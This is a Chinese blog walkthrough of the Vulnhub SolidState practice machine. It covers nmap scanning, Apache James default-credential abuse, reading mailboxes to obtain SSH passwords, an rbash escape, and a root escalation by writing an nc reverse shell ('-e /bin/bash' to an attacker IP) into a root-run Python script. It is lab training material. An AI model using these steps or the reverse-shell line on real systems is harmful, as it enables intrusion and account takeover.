Vulnhub-SolidState打靶

原创 已于 2024-12-25 22:23:12 修改 · 1k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #网络安全 #web安全 #python

于 2024-12-25 22:22:30 首次发布

目录

一、nmap扫描

二、pop3泄露的ssh密码登录ssh,并rbash逃逸

三、root权限脚本反弹shell提权

四、总结

一、nmap扫描

nmap -sT --min-rate 10000 192.168.213.141 -oA nmapscan/port

扫描tcp开放了那些端口,保存到nmap/port中

nmap -sU --min-rate 10000 192.168.213.141  -oA nmapscan/port

扫描udp开放了那些端口,保存到nmap/udp中

nmap -sT -sC -Pn -v -sV -O 192.168.213.141  -oA nmapscan/detail

对开放的端口进行详细的探测,保存到detail中

nmap --script=vuln 192.168.213.141  nmapscan/vuln 
使用nmap的漏洞扫描脚本进行漏洞扫描

二、pop3泄露的ssh密码登录ssh,并rbash逃逸

通过nmap扫描发现,25,110,119,4555端口都有一个关键词“JAMES”,使用searchsploit进行搜索  searchsploit james

searchsploit -m 50347

根据说明构造语句

python 50347.py 192.168.213.141 192.168.213.128 8888

nc -lvnp 8888

发现不能直接getshell

但是在py脚本里发现了james-admin默认密码

之前用nmap进行端口扫描的时候,知道了4555端口是james-admin 服务

telnet 192.168.213.141 4555    成功登录

列出来用户,有一个命令是setpassword,对列出的用户修改密码,目的看看那个用户能登录pop3

登录pop3           telnet 192.168.213.141 110

在mindy 用户发现接收的邮件

stat   看是否有邮件

list     列出有几封,并写出长度

top 1 1109     看第一封邮件,长度为1109

在第二封邮件发现ssh密码

ssh登录       ssh mindy@192.168.213.141

发现是rbash,进行rbash逃逸

ssh mindy@192.168.213.141 "export TERM=xterm;python -c 'import pty;pty.spawn(\"/bin/bash\")'"

三、root权限脚本反弹shell提权

sudo提权X

内核提权X (可以看出靶机作者并不想考怎么进行内核提权)

自动任务提权X

SUID Polkit提权X

systemd-run -t /bin/bash

使用CVE-2021-4034进行提权,也是不行

ps -aux | grep james

发现一个以root权限执行的py脚本,反弹shell获得root权限

echo 'import os; os.system("/bin/nc 192.168.213.128 443 -e /bin/bash")' > /opt/tmp.py  

nc -lvnp 443

 提权成功,

四、总结

通过James-admin的默认密码登录后,修改所有用户的密码后,登录pop3发现邮件里面的ssh密码,登录并进行rbash逃逸,最后使用root执行的py文件进行提权。

vulnhub-SolidState: 1靶机渗透测试
m0_68117643的博客
07-05 1058
vulnhub-SolidState: 1靶机渗透测试
渗透Vulnhub-Solidstate靶机
C-HOWE的博客
12-26 813
本篇文章旨在为网络安全渗透测试行业靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列Solidstate靶机有定的了解。
Vulnhub--Solidstate 邮件服务渗透如何渗透
qq_60870726的博客
12-12 3527
web页面主要就是看 cms 交互 目录端口服务去HackTricks查smtp一般都是 枚举用户名 弱口令 或者cms遇到交互差不能用vi或者vim的怎么办?sed echo重写文件cat tmp.py | sed 's/rm -r \/tmp\/\*/123/g' sed处理数据rbash的绕过还是要么ssh登陆时要么就是用里面的命令邮件服务器一定要看邮件POP 命令:用户 uid 以 “uid” 身份登录PASS 密码 用 “password” 代替您的实际密码。
小白的靶机VulnHub-SolidState
热门推荐
wo41ge的博客
02-18 2万+
靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/ 开机界面就是这样 拿到靶机的IP地址:192.168.106.151 可以看到的靶机开放了22(ssh)、25(smtp)、80(http)、110(pop3)、119(nntp)、4555(james-admin) 这里有一个漏洞:JAMES Remote Admin 2.3.2存在漏洞 具体可以看这里 那我们就直接去4555端口 因为是Remote Admin Service 所以我们上nc连
实战打靶集锦-002-SolidState
阿尔泰野狼的博客
01-21 1727
本文记述了博主打靶的心路历程。
靶场之路-VulnHub-SolidState: 1直接上演碟中谍之谁的nc -vnlp,看我一个欧洲步闪转腾挪拿到root
Zeu_s的博客
03-04 654
说实话,最后提权用nc有点绕、抽象,但是相比之前打靶机确实有很大进步,得把反弹shell语法记住,这个很关键,nc也得再精进一点,这东西是真好用,砍瓜切菜很顶。
No.37-VulnHub-SolidState: 1-Walkthrough渗透学习
qq_34801745的博客
01-31 1251
** VulnHub-SolidState: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/ 靶机难度:中级(CTF) 靶机发布日期:2018年9月12日 靶机描述: 它最初是为HackTheBox创建的 目标:得到root权限&找到flag.txt 作者:大余 时间:2020-01-31 请注意:...
vulnhub:SolidState
cjstang的博客
06-14 927
OSCP-No.1:SolidState,主要漏洞利用方式:4555端口james服务默认密码漏洞+rbash逃逸提权
Vulnhub-Source-1(CVE-2019-15107)
weixin_41003808的博客
03-12 83
合集 - oscp备考-靶机(15)1.#oscp#渗透测试 kioptix level 3靶机getshell及提权教程2024-12-152.渗透测试-Kioptix Level 1靶机getshell及提权教程2024-12-063.#渗透测试 kioptix level 2靶机通关教程及提权2024-12-244.SolidState靶机通关教程及提权2024-12-255.Vulnhub...
【java入门到放弃】网络
WZDBXHNL的博客
12-28 816
防火墙既可以是硬件,也可以是软件,本质上是一种,而不是只能对应某一种形态。
手写TCP/IP协议栈——实现ping响应不可达
Tandy12356_的博客
12-27 494
打开Tftp32软件,选择Tftp Client选项,配置目的主机的IP地址,下面几个内容随便填。对方检查校验和出现问题就直接丢包了,不会给我们回应,但是可以使用wireshark提醒。同时对于TCP和UDP的校验和检查也可以提前勾选上(后面会用到)编辑 -> 首选项 -> 协议 -> IPV4 勾上校验和检查。wireshark抓包ICMP不可达响应截图。点击Get之后可以向目的主机发送请求。
Linux系统编程(网络编程)
m0_64823929的博客
12-24 424
sudo vim /etc/network/interfaces 虚拟机网络配置文件 ,设置ip(手动分配,或自动分配)。ifconfig ens33 192.168.0.13/24 up 临时设置本机ip地址,重启后失效。sudo /etc/init.d/networking restart 进行网络设置的加载,ip地址版本, V4(主流) V6(未来的方向)传输层 ====》端口号tcp udp。接口层 ====》网卡 驱动 1GB。网络层 ====》IP 地址。应用层 ====》应用程序。
c#Socket学习,使用Socket创建一个在线聊天,日志笔记(5)
学不会shader
12-25 1148
32位整数:0x12345678高位字(High Word):0x1234(高16位)低位字(Low Word):0x5678(低16位)64位整数:0x123456789ABCDEF0高位双字(High Dword):0x12345678(高32位)低位双字(Low Dword):0x9ABCDEF0(低32位)
FW基本概述
汤小萌的博客
12-26 770
1. 基于五元组的访问控制(最基础且核心)这是防火墙策略的基石。源IP地址目的IP地址源端口号目的端口号协议类型(如TCP、UDP、ICMP)通过这五元组,防火墙可以制定极其精细的策略,例如:“只允许财务部的IP段访问服务器的TCP 443端口,其他一律拒绝2. 基于用户/用户组的控制现代防火墙能将IP地址与具体用户身份绑定。策略可以写成:“允许‘市场部员工组’在上班时间访问‘社交媒体应用类’”,而不是写一串复杂的IP地址。这大大提升了策略的可读性和管理效率。
spring boot 运行测试类时:Error creating bean with name ‘serverEndpointExporter‘ 问题
csdndd521的博客
12-26 247
这个在Websocket中,注入不进去,单元测试时报错。直接在@SpringBootTest加入。
白帽系列01: 抓包
JoStudio
12-26 884
WhiteHat是一个Java网络抓包分析库,支持TCP/UDP等协议的数据包捕获与发送。使用前需安装WinPcap/libpcap依赖库。通过Maven引入依赖后,只需3步即可实现抓包功能:打开网卡、定义处理程序、开始抓包。支持BPF过滤表达式、数据包转存为.pcap文件,并提供ARP/ICMP/DNS/DHCP等协议处理示例。特别提供高效的IP网段扫描(5000IP/秒)和端口扫描(5000端口/秒)功能,速度优于nmap。最后提出两个实践场景:办公室设备状态监测和智能WIFI访客感知。
浏览器输入url后。。。
xuehao1997的博客
12-29 297
文章摘要: 当在浏览器输入URL并回车后,整个过程分为多个阶段:URL解析(补全协议)、DNS查询(从缓存到根域名服务器逐级解析)、TCP三次握手建立连接(HTTPS还需TLS握手)。随后浏览器发送HTTP请求,服务器处理并返回响应(HTML/CSS/JS等)。浏览器解析响应,构建DOM和CSSOM树,渲染页面并加载额外资源(如图片、脚本)。最终页面可交互(TTI)。关键优化点包括DNS预解析、HTTP/2多路复用、缓存策略及前端懒加载等。整个过程涉及网络协议、安全加密和浏览器渲染机制。(149字)
第3天:基础入门-抓包&封包&协议&APP&小程序&PC应用&WEB应用|小迪安全笔记|网络安全|
最新发布
weixin_45635831的博客
12-29 589
TDR阻抗测试仪和网络分析仪的主要区别和应用
Bamtone的博客
12-29 213
TDR阻抗测试仪采用时域反射技术,通过分析反射波形检测传输线阻抗分布和不连续点,适用于PCB走线/线缆的阻抗测量和故障定位。相比网络分析仪的频域测量方式,TDR更直观显示阻抗突变位置,操作简便,适合产线快速检测,而网络分析仪则擅长宽带S参数测量和射频器件分析。两种仪器在测量原理和应用场景上各有侧重。
PowerFlex1769-SM2 Modbus模块用户指南
由于SM2是基于固态技术的控制模块,与传统机电设备存在显著差异,因此使用前必须遵循Solidstate equipment的特殊安全指南,如Publication SGI-1.1,此文档可在Rockwell Automation的官方网站或当地销售办事处获取。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值